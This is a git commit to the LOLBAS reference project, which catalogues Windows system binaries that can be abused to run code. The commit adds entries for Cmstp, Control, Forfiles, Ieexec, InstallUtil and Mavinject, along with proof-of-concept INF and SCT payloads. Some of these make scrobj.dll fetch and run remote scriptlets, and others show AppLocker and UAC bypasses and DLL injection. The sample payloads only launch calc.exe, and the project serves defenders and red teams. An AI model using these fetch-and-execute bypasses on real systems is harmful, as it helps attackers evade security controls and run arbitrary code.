Added some more

master
api0cradle 2018-04-18 18:33:16 +02:00
parent cde3fc7f7f
commit 5e169efd74
16 changed files with 286 additions and 38 deletions

View File

@ -14,7 +14,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Ie4unit.exe](OSBinaries/Ie4unit.md)
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
[Installutil.exe](OSBinaries/Installutil.md)
[Mavinject32.exe](OSBinaries/Mavinject32.md)
[Mavinject.exe](OSBinaries/Mavinject.md)
[Msbuild.exe](OSBinaries/Msbuild.md)
[Msdt.exe](OSBinaries/Msdt.md)
[Mshta.exe](OSBinaries/Mshta.md)

View File

@ -8,3 +8,21 @@ ATBroker.exe /start malware
Acknowledgements:
* Adam - @hexacorn
Code sample:
* Missing
Resources:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Full path:
```
C:\Windows\System32\Atbroker.exe
C:\Windows\SysWOW64\Atbroker.exe
```
Notes:
Not certain if it works on Windows 10.

View File

@ -1,11 +1,37 @@
## CMSTP.exe
## Cmstp.exe
* Functions: Execute
* Functions: Execute, UACBypass
```
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf
```
Acknowledgements:
* Oddvar Moe - @oddvarmoe
* Nick Tyrer - @NickTyrer
Code sample:
* [Cmstp.inf](Payloads/Cmstp.inf)
* [Cmstp_calc.sct](Payloads/Cmstp_calc.sct)
Resources:
* https://twitter.com/NickTyrer/status/958450014111633408
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
* https://github.com/hfiref0x/UACME
Full path:
```
C:\Windows\system32\cmstp.exe
C:\Windows\sysWOW64\cmstp.exe
```
Notes:

View File

@ -1,16 +1,34 @@
## Control.exe
* Functions: Execute
* Functions: Execute, Read ADS
```
control.exe c:\windows\tasks\file.txt:evil.dll
control.exe
(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate)
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
*
Resources:
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
* https://twitter.com/bohops/status/955659561008017409
Full path:
```
C:\Windows\system32\control.exe
C:\Windows\sysWOW64\control.exe
```
Notes:
Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate.
```
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
/v EvilCPL.cpl /t REG_SZ /d "C:\Folder\EvilCPL.cpl"
```

View File

@ -1,10 +1,32 @@
## Forfiles.exe
* Functions: Execute
* Functions: Execute, Read ADS
```
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
```
Acknowledgements:
* Eric - @vector_sec
* Oddvar Moe - @oddvarmoe
Code sample:
*
Resources:
* https://twitter.com/vector_sec/status/896049052642533376
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Full path:
```
C:\Windows\system32\forfiles.exe
C:\Windows\sysWOW64\forfiles.exe
```
Notes:

View File

@ -1,12 +1,29 @@
## ie4unit.exe
## Ie4unit.exe
* Functions: Execute
```
ie4unit.exe -BaseSettings
(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section)
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
*
Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Full path:
```
c:\windows\system32\ie4unit.exe
c:\windows\sysWOW64\ie4unit.exe
c:\windows\system32\ieuinit.inf
c:\windows\sysWOW64\ieuinit.inf
```
Notes:
copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section

View File

@ -7,4 +7,22 @@ ieexec.exe http://x.x.x.x:8080/bypass.exe
```
Acknowledgements:
* ?
* Casey Smith - @subtee
Code sample:
*
Resources:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Full path:
```
c:\windows\system32\ieexec.exe
c:\windows\sysWOW64\ieexec.exe
```
Notes:

View File

@ -3,8 +3,29 @@
* Functions: Execute
```
InfDefaultInstall.exe shady.inf
InfDefaultInstall.exe Infdefaultinstall.inf
```
Acknowledgements:
* Kyle Hanslovan - @kylehanslovan
Code sample:
* [Infdefaultinstall.inf](Payload/Infdefaultinstall.inf)
* [Infdefaultinstall_calc.sct](Payload/Infdefaultinstall_calc.sct)
Resources:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
Full path:
```
c:\windows\system32\Infdefaultinstall.exe
c:\windows\sysWOW64\Infdefaultinstall.exe
```
Notes:
Some specific details about the binary file.

View File

@ -8,3 +8,31 @@ InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
```
Notes:

32
OSBinaries/Mavinject.md Normal file
View File

@ -0,0 +1,32 @@
## Mavinject.exe
* Functions: Execute
```
MavInject.exe <PID> /INJECTRUNNING <PATH DLL>
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
```
Acknowledgements:
* Giuseppe N3mes1s - @gN3mes1s
* Adam - @hexacorn
Code sample:
*
Resources:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexacorn/status/776122138063409152
Full path:
```
C:\Windows\System32\mavinject.exe
C:\Windows\SysWOW64\mavinject.exe
```
Notes:

View File

@ -1,14 +0,0 @@
## Mavinject32.exe
* Functions: Execute
```
MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
```
Acknowledgements:
* Giuseppe N3mes1s - @gN3mes1s
* Adam - @hexacorn

View File

@ -0,0 +1,14 @@
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

View File

@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

View File

@ -0,0 +1,8 @@
[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct

View File

@ -0,0 +1,16 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

View File

@ -1,9 +1,10 @@
# Living Off The Land Binaries and Scripts
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
There are two different lists.
[LOLBins](LOLBins.md)
[LOLScripts](LOLScripts.md)
* [LOLBins](LOLBins.md)
* [LOLScripts](LOLScripts.md)